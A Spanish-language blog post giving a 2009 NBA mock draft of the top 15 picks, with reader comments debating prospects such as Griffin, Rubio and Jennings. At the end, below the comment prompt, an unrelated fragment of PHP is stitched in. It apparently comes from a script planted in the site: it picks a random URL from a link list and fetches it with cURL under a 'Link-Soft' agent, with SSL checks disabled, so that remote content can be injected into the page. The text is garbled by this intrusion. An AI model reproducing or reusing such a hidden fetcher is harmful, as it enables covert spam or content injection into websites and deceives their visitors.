Mock Draft 2009 – Top 15

17 de June de 2009 por Viva_Dirk

Tras las emociones vivdas estos últimos días con la victoria de los Lakers, el MVP de Kobe y el anillo de Gasol, llega el momento de echar un vistazo al próximo gran acontencimiento de la NBA.  dentro de tan sólo 8 días, la franquicias se enfrentarán a decisiones cruciales que pueden marcar su futuro a corto y largo. Hablamos, como no, del draft. Y para empezar vamos con un mock de las 15 primeras posiciones, en las que parece que puede haber mas de uno y más de 2 movimientos y traspasos.

Nº1 L.A Clippers – Blake Griffin: Cualquier otra elección sería una sorpresa de dimensiones siderales. Comparado con Carlos Boozer, Griffin es un PF clásico con un físico de alero,  muy fuerte y capaz de anotar cerca del aro sin problemas, intenso en defensa y generoso en ataque aunque el pase no pueda decirse que sea su mayor virtud. Lo que le diferencia de estos PF clásicos como Malone o Boozer son las piernas y la capacidad de bote que tiene, que le acercan mas al modelo de Charles Barkley. Ya sé que son palabras mayores pero hay que mojarse.

Nº2 Memphis Grizzlies – Ricky Rubio: Nuestro Ricky es junto a Griffin el jugador que tiene más pinta de poder convertirse en una gran estrella de la liga y aunque en Memphis hayan mostrado últimamente confianza en Michael Conley no sería un buen negocio dejarlo pasar. Para no alargarme con sus virtudes, diré que las dudas que crea Ricky a día de hoy vienen dadas por su pobrísimo tiro exterior y la incógnita de si pasar a jugar 82 partidos no será un cambio demasiado grande. A mi no me asusta ninguna puesto que en su primer año debe alejarse de la odiosa comparación con Maravich para dejar ver que es un director de juego de los que casi no quedan y un incansable defensor.

Nº3 Oklahoma City Thunders – Hasheem Thabeet: Los Thunder necesitan juego interior y no precisamente anotadores, lo cual nos lleva de cabeza al center tanzano de los Huskies. Con 2.21 de estatura y la movilidad de un alero llega a la liga como un tremendo taponador y un jugador listo para aprovechar ventajas. No es un estilista al poste pero no es nulo en ese aspecto y para dominar el apartado reboteador tendrá que meterse horas de gimnasio. Es lo que necesita Oklahoma.

Nº4 Sacramento Kings – Brandon Jennings: Los Kings quieren a Ricky y no necesitan a Harden, así que optarán por el otro base con más nombre del draft. Jennings fue estrella en el HS pero en Europa no ha tenido todo el protagonismo que esperaba. Se trata de un base rapidísimo y con gran manejo del balón, letal tanto en el uno contra uno como en el dribbling, ideal para un equipo que quiera jugar rápido. Defensivamente tiene buenas manos y desplazamientos rápidos aunque no es precisamente un perro de presa. En su debe podemos dejar su tiro exterior y el juego en estático donde no es una cabeza pensante.

Nº5 Washington Wizards – James Harden: Si Arenas está realmente recuperado al 100%, Harden puede ser la pieza que encaje perfectamente en estos Wizards. Ofensivamente es un jugador completísimo ya que excepto jugar en el poste podemos verle hacer cualquier cosa. A pesar de no ser excesivamente rápido ni fuerte es capaz de generar juego para los demás y de crearse sus propios tiros, lo que le convierte en un muy buen jugador. Es en el apartado defensivo donde puede sufrir más. Con 1.92 y sin un gran físico va a pasarlo mal contra escoltas más grandes y fuertes.

Nº6 Minnesota Timberwolves – Stephen Curry: Una de las muñecas más espectaculares de la historia de la NCAA y es que Curry ha terminado su último año universitario con 28.6 puntos por encuentro. Es un anotador salvaje con grandes desventajas físicas con casi cualquier jugador de la NBA ya que apenas supera el 1.85 y no creo que pese 80 kilos ni de lejos. Su posición natural es la de escolta pero ha reconvertido su juego al de base en este último año. Talento desde luego le sobra y a los Wolves les vendría muy bien un anotador de esta categoría.

Nº7 Golden State Warriors – Jeff Teague: Los Warriors necesitan un base y pero no un base cualquiera sino uno que pueda jugar a mil por hora y ese es Teague, aunque dios dirá que hace Nelson con él si sigue en el banquillo la temporada que viene. El base de Wake Forest es un base anotador con un físico explosivo, como Bayless, aunque con más experiencia y menos potencial.

Nº 8 NY Knicks – DeMar DeRozan: Se trata de un alero superdotado físicamente y con un deficit terrible en el tiro de media y larga distancia. Un proyecto de superestrella que necesita pulirse. Desde luego donde puede funcionar a las mil maravillas es en el estilo D’Antoni ya que a campo abierto es imparable. Con él puede pasar que ni juegue ni un minuto o que juegue y lo haga fenomenal porque lo tiene todo para ser una estrella.

Nº9 Toronto Raptors – Tyreke Evans: Los Raptors necesitan un anotador exterior y Evans puede ofrecer eso sin duda ya que en su único año universitario ha alcanzado los 17 puntos.  Se trata de un jugador de  talento con capacidad para el uno contra uno y que a la vez no se le considera demasiado egoista. En una franquicia tan europeizada como los Raptors no me extrañaría que nos sorprendieran con otro escolta que aparece mucho mas bajo en los mocks, Wayne Ellington, que para mí es exactamente lo que necesitan.

Nº10 Milwaukee Bucks – Jonny Flynn: Necesitan un base y Flynn es el mejor que queda. El base de Syracuse destaca por ser un gran competidor y haber metido varios tiros decisivos así que en ese sentido no cabe duda de que no le podrá la presión. Físicamente poderoso, rápido y capaz de llevar el ritmo de los partidos. Crean dudas su escasa estatura y su defensa.

Nº11 NJ Nets – Jordan Hill: En mi opinión uno de los bluffs de este draft, bluff para un top-5 desde luego. Es jugador de 2.08 netamente interior sin un gran físico ni un gran talento. Desde luego es trabajador e intenso pero no creo que pueda ser más que un Varejao.

Nº12 Charlotte Bobcats – Gerald Henderson: Henderson es un jugador ‘100% Larry Brown’: potente físicamente, buen defensor, más amigo de la zona que del tiro de 3 y no muy dado a las florituras.

Nº13 Indiana Pacers – DeJuan Blair: Una autentica mole de 2 metros y 125 kilos que está siempre bien colocado para el rebote. Esa es la gran cualidad de Blair, un instinto sobrenatural para el rebote acompañado de un gran capacidad para dejar rápido el balon dentro del aro sin complicarse la vida. Paul Millsap es la comparación mas clara aunque Blair es algo más pequeño y más fuerte.

Nº14 Phoenix Suns – Terrence Williams: Un autentico todoterreno, fortísimo y preparado para rendir desde el primer momento. No podemos esperar de él jugadas de gran clase pero siítremendos mates e intensidad en todas sus acciones.

Nº15 Detroit Pistons – Chase Budinguer: Debería tener una larga y productiva carrera en la liga porque es un jugador capaz de aportar en todas las facetas del juego. En este aspecto se trata de un jugador muy europeo. Su espcialidad no es el uno contra uno pero desde luego es capaz de crear desequilibrios. Con algo más de físico sería un top-5 de este draft.

Comenta

19 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Analisis muy completo, que ganas de que llegue la fecha del draft, no solo por saber los puestos, sino también pq posiblemente se produzcan muchisimos traspasos, recordemos que Clippers se va a llenar de jugadores altos, y tendrán que desprenderse de alguien …

    No tengo muy claro que Brandon Jennings sea elegido en un puesto tan alto. Ha demostrado por su paso europeo que está aún muy verde, y los equipos que eligen tan alto necesitan ya jugadores productivos.

    Aunque todo indica que Jordan Hill tendrá un puesto más alto, estoy con Viva_Dirk en que es un jugador que no me convence lo que he visto de él.

    Quitando a Griffin y Rubio, mi debilidad en este draft es Tyreke Evans, su progresión durante la temporada NCAA ha sido fantastica. También destacaría a Austin Daye, un calco fisicamente de Prince (Det), aunque tendría que haber esperado un año más para dar el salto.

    Y por otra parte no entiendo pq ningún draft coloca a Ty Lawson en puestos alto. Yo creo que es de los jugadores que más preparado está en este momento para ser productivo en cualquier franquicia. Posiblemente no es el que más potencial tiene, pero para mi en este momento sería titular en unas 10 franquicias.

      Citar

  2. Txusma dice:
    #2

    Es que es casi imposible acertar el orden de este año con la cantidad de traspasos que pueden llegar a producirse. NY puede intentar subir posiciones para hacerse con Curry, lo mismo que Minnessota con Rubio (ojito q podrian mandar a Love a Memphis para quedarse igualmente con la eleccion 6, o eso dice el rumor), …
    Del gran analisis de Viva discrepo en algunos puntos:
    – Creo, como Kantonyo, que jennings caera bastante pq realmente esta verdisimo. Eso no quiere decir que a largo plazo, y tras su estancia en Europa, acabe siendo el segundo mejor base de la promocion tras Ricky.
    – GSW tiene problemas y es q no esta claro que Ellis continue en el equipo. De hecho Monta lo quiere abandonar y de quedarse ha puesto la condicion de que no elijan a un base en la septima eleccion. Que digo yo, y quien se cree q es para poner condiciones?
    – A mi me da la sensacion que Rubio acabara saliendo en la 4 elección y los Kings lloraran de alegria. Eso si, no me extrañaria que hubiese movimientos entre Memphis, Oklahoma y Sacramento para ordenar sus elecciones en funcion de sus necesidades.
    – Yo creo que lo que mas necesita realmente Minny es un base, pq para escolta tirador ya tiene a Foye que de hecho a demostrado jugar mejor de escolta que de director de juego. Así que no me extrañaria ver a Flynn o Jennings aparecer por ahí.
    – No creo q los Knicks se tiren a por DeRozan mimando como miman a Gallinari. De hecho, es justo la posicion q creo que no quieren cubrir, mas que nada pq en el 2010 a lo mejor llega “King” James.

    Como molan estos analisis que permiten discutir largo y tendido!

      Citar

  3. Fran Reyes dice:
    #3

    No puedo entrar a debatir mucho sobre este tema, pero estoy de acuerdo con Txusma y Kantonyo en que Jennings va a estar más abajo de la cuarta posición; lo veo en Minessotta (6º)

    ¡Grandísimo post!

      Citar

  4. Dantley2 dice:
    #4

    Pedazo de análisis. De los que este año conozco -bastante menos que el año pasado- me cuadra mucho lo que has comentado.

    Yo creo que habrá trades y que al final Ricky saldrá el 2. En el dudoso caso de que no pase, creo que al final Memphis irá a por Thabeet para no complicarse la vida, si confían en que Marc Gasol puede jugar más de 4 y hacer unas mini torres gemelas, con tres exteriores muy exteriores y Mayo a la cabeza. En ese caso Oklahoma igual se arriesga con Rubio y su posible incompatibilidad con Westbrook o sí que aquí se da el trade incluso quizá con Sacramento. Si es así Rubio para Sac y pega más Harden para OKC. Harden no me entusiasma, pero tiene mucho nombre y se ve como un proyecto ya hecho, aunque yo lo veo un Battier sin ese aire presidencial de Battier.

    A Jennings lo veo más abajo, tiene más pinta de Telfair que de Chris Paul. No me extrañaría que si Sacramento no tiene a Ricky, el elegido sea Tyreke Evans que coincido con Kantonyo que tiene muy buena pinta, aunque no es base puro.

    A partir del 5, quien sabe. Curry sí lo veo en los Wolves, pero Golden State amenazas incluidas de Ellis es una incógnita. Y a los Knicks los veo más drafteando un base para tener más maniobrabilidad para el 2010.

    La verdad es que este año veo más complicado el mock. Además, me parece un draft bastante más flojo que el año pasado de largo.

    Entre las sorpresas el que me gusta es Flynn

      Citar

  5. Kantonyo dice:
    #5

    Aunque Evans ha jugado de base en Memphis Tigers, yo lo considero un escolta, no lo veo jugando de base en la NBA. Tras la marcha de Rose, no existía un base puro en los Tigers, y en su primer año en la Universidad lo colocaron en esa posición, tardó en acoplarse posiblemente debido a ese aspecto. Es el único motivo que le ha llevado a jugar en esa posición. Parece que su altura está cercana a los 1,96. Por lo que dudar si es base o no, con esa altura, nos da un ejemplo de la calidad de este jugador.

    Si tuviera que buscar una comparación me quedaria con : Tracy McGrady.

    En su contra, sus problemas extradeportivos: http://archivo.marca.com/edicion/marca/baloncesto/es/desarrollo/1072580.html

    como ya contó marca hace unos años ….

      Citar

  6. Oasis79 dice:
    #6

    Enhorabuena por el blog. Magnífico, sin duda el mejor sobre la NBA en español.

      Citar

  7. Viva_Dirk dice:
    #7

    Kantonyo, lo que menos ha preocupado a los equipos que eligen arriba en el draft desde hace casi una década es que el jugador puedan rendir desde el primer momento, la mayoria busca estrellas y en el caso de Sacramento que no tienen un Kevin Durant ni un Al Jefferson será lo que iran buscando, una posible estrella y creo que Jennings encaja en ese perfil.

    Luego lo de los Knicks, sinceramente creo que los Knicks se moverán y si les llega DeRozan lo cogerán porque es un jugador con bastante nombre y puede ser una buena pieza de traspaso.

      Citar

  8. Txusma dice:
    #8

    De hecho a los Knicks les veo subiendo posiciones para buscar a Curry (q saldra antes de la 8) y si ya se vuelven medio locos, la 2 para pillar a Ricky. De hecho, sono con fuerza un David Lee x Numero 2.

      Citar

  9. TheDeerHunter dice:
    #9

    En la oficial de la NBA han hecho un “consensus” draft contra algunos de los blogs más populares (ESPN, hoops world, real GM, Draft express, inside hoops, etc…)

    Parece claro que lo de Griffin es apuesta segura (aunque no se sabe que harán los Clippers con tanto hombre grande) a partir de ahí las dudas… Ricky y Thabeeth salen 2º y 3º en el consensus como habéis puesto vosotros, aunque Thabeeth aparece más veces que Ricky en el 2º de entre los 12 blogs que se tienen en cuenta.

    A Jennings lo hunden hasta el 10º, bailando alegremente entre el 4º pick hasta ni siquiera salir entre los 14 primeros (Hoopsworld, cágate) La más común es la 13, ¿los Pacers?? no me lo creo.
    A Harden lo ponen muy arriba… en algunos incluso disputándoles el 2º a Ricky y Thabeet. (Draftexpress)
    A Curry casi todo el mundo lo pone en los Knicks… mock drafts y noticias diversas. Parece que lo tienen muy seguro ¿futuro rival de sergio?? Han hecho una encuesta y también le ponen con más potencial que Ricky ¿consecuencia de lo de NY??

    Teague apenas aparece en algún mock… a todo lo más en las últimas posiciones de alguno. Sin embargo al ¿bluff?? Hill lo suben al 5º para Washington, Evans se iría en la 6º a parar a Minnesotta (si no se hace el traspaso Stoudemire-Al Jeff. + 6º pick, en cuyo caso caería en los Suns) y DeRozan iría a los Warriors.

    Pronto aparece un tal Jrue Holliday que no habéis nombrado (la ESPN y RealGM lo ponen en la 4) que según esto se iría de compi de Calderon. Las últimas plazas las dan para Flynn, DeJuan Blair, Gerald Henderson y Earl Clark. A Terrence Williams y a Chase Budinger no veo que les den demasiada bola.

      Citar

  10. Jabho dice:
    #10

    Jajaja, Holliday no está en el top-15 porque el mock lo ha hecho Viva… si lo hubiera hecho yo 😉

    La carrera Holliday va a darle muchas vueltas a Budinguer, Teague y algún otro. Rozan es una incógnita, pero alrededor del 10 será una buena elección porque si sale bien…

    Jennings creo que saldrá alto porque tiene cartel y Henderson si no lo coge Charlotte caerá 10 puestos…

    En lo demás más o menos de acuerdo 😉

      Citar

  11. Txusma dice:
    #11

    Si ya digo q este año es casi imposible acertar un mock. Va a estar realmente interesante…
    Por cierto, Deer, ese traspaso q comentas (Stoudemire-Al Jeff. + 6º pick) donde lo has visto? No entiendo pq los Wolves deberian compensar con la eleccion numero 6. Ahora mismo Jefferson y Stoudamire me parecen muy, muy parejos.

      Citar

  12. Dantley2 dice:
    #12

    Complicadísimo, y seguro que habrá muchos trades de última hora y en cadena.

    Una cosa que llama la atención mucho es el solar que es este año el draft en cuestión de centers, no recuerdo nada igual. Está Thabeet, y después Mullens que es carne de D-League para un par de años y ya después nada, vamos, nada del tipo drafteo a Dueñas por si acaso como Kravtsov, el gigantón australiano Nevill o la mole Siler. Por cierto, yo equipo ACB medio lo intentaba con Nevill o incluso con Siler, en ligas con menos partidos el físico les puede aguantar y aunque arriesgada es una apuesta que si sale bien a equipos que jueguen despacio les puede arreglar una temporada.

    Afortunadamente al draft lo salvan los bases, es fácil que salgan 10 en primera ronda con perspectivas de tener carreras largas en la NBA.

      Citar

  13. Viva_Dirk dice:
    #13

    Dantley, ¿no consideras center a DeJuan Blair? Para mi la comparación que mas me gusta es con Horford, que se me olvidó ponerlo, es un jugador de 2 metros pero sin absolutamente nada de tiro de media distancia, muy fajador y capaz de defender en el cuerpo a cuerpo a cualquier center aunque luego puedan tirar por encima suyo.

      Citar

  14. TheDeerHunter dice:
    #14

    @Txus… lo de Stat y Al Jefferson lo he visto en muchos sitios. Uno de ellos inside Hoops. Con AJ y conservando la base que tienen a mí me parece que los Suns vuelven a ser candidatos a todo.

    Parece que los Grizzlies han insinuado que no traspasarán el 2º pick. Malo para Ricky… pero toma fuerza la opción de Harden. Muy bueno tiene que ser…

      Citar

  15. Kantonyo dice:
    #15

    Puede ser buena comparación la de Blair con Horford, a mi tb me recuerda a Al Jefferson pero con menos cms y tambien mucho menos recursos ofensivos.

    Bj Mullens es toda una incognita. A principio de temporada competía incluso con Griffin para el número 1, pero no ha contado mucho para Ohio State, donde solo ha jugado 20 minutos por partido. Posiblemente el entrenador ha querido dosificarle para una segunda temporada, pero Bj Mullens sorprendentemente ha decidido dar el salto este año. En mi opinión debería haber aguantado un año más en la NCAA.

    A su favor para un buen puesto, está como comentais la escasez de pívots.

    Necesitará confianza para progresar, todo dependerá de la franquicia que le seleccione, pero creo que es muy precipitado decir que acabará en la D-League. Aunque ha jugado poco este año no lo ha hecho mal cuando ha participado.

    Para mí es uno de los jugadores que se presentan con más potencial de futuro.

    En cuanto a Jrue Holiday, es curioso lo que está subiendo en los mocks en el último mes. Se esperaba muchisimo más de este jugador, posiblemente haya sido una de las decepciones junto a UCLA, de la NCAA. Pero es un jugador muy mediatico, sobre todo por jugar en UCLA. Es famoso en California y eso parece que le está alzando en los mocks. Para mí según lo que he visto no me ha dejado mejores sensaciones que otros bases como Ricky Rubio, Stephen Curry, Jonny Flynn ó Ty Lawson. Pero es uno de los jugadores más prometedores de este año, cosa que para mí no ha demostrado este año en la NCAA.

    Su compañero Darren Collison podría ser buena elección para los Lakers.

    También destacar al base venezolano Greivis Vazquez, ha tenido una muy buena temporada con Maryland, donde ha tenido uno de los mejores números de la liga. Todavía me acuerdo del partidazo contra North Carolina donde Maryland dió la sorpresa ganando con 35 puntos, 11 rebotes y 10 asistencias de este jugador. Va a estar rozando la segunda ronda. Yo le daría una oportunidad en la NBA pero si fuera un equipo de ACB intentaría traermelo a toda costa.

      Citar

  16. Kantonyo dice:
    #16

    Vaya acabo de leer que el venezolano se ha retirado del draft para estar un año más en la Universidad, según dice quiere acabar sus estudios antes de dar el salto…..

      Citar

  17. Txusma dice:
    #17

    Pero a ver, q ese traspaso Amare-Jefferson me parece de chiste. Si es que creo que quien deberia compensar son los Suns!! Normal que os encante para ellos.

      Citar

  18. Viva_Dirk dice:
    #18

    Yo tampoco creo que los Grizzlies vayan a vender la elección, pero una vez elegido Ricky si pueden venderlo a el o a Conley. Aunque vaya sería una decisión muy típica de Memphis elegir en con el Nº2 a Harden cuando lo mejor que tienen está precisamente en esa posición.

    En cuanto a Holiday, coincido con Kantonyo, para mi no ha demostrado casi nada.

      Citar

  19. Dantley2 dice:
    #19

    Correcto, Vázquez se ha retirado, también algunos secundarios como Harangody o Majok, además de algún europeo, Macvan el más sonado.

    Viva, me resisto a considerar center a Blair, anda en 1,96, ni a los dos metros llega con zapatos. En la NCAA dominaba, pero en la NBA lo va a tener complicado. Aunque ojito, viendo más videos es bastante menos tronco de lo que pensaba, tiene unos movimientos muy interesantes. Eso sí, con 3 contra 1 que le hacían lo tenía más complicado. Vamos a ver, no sería el primero que con ese cuerpo triunfa y no todos se llamaban Barkley.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>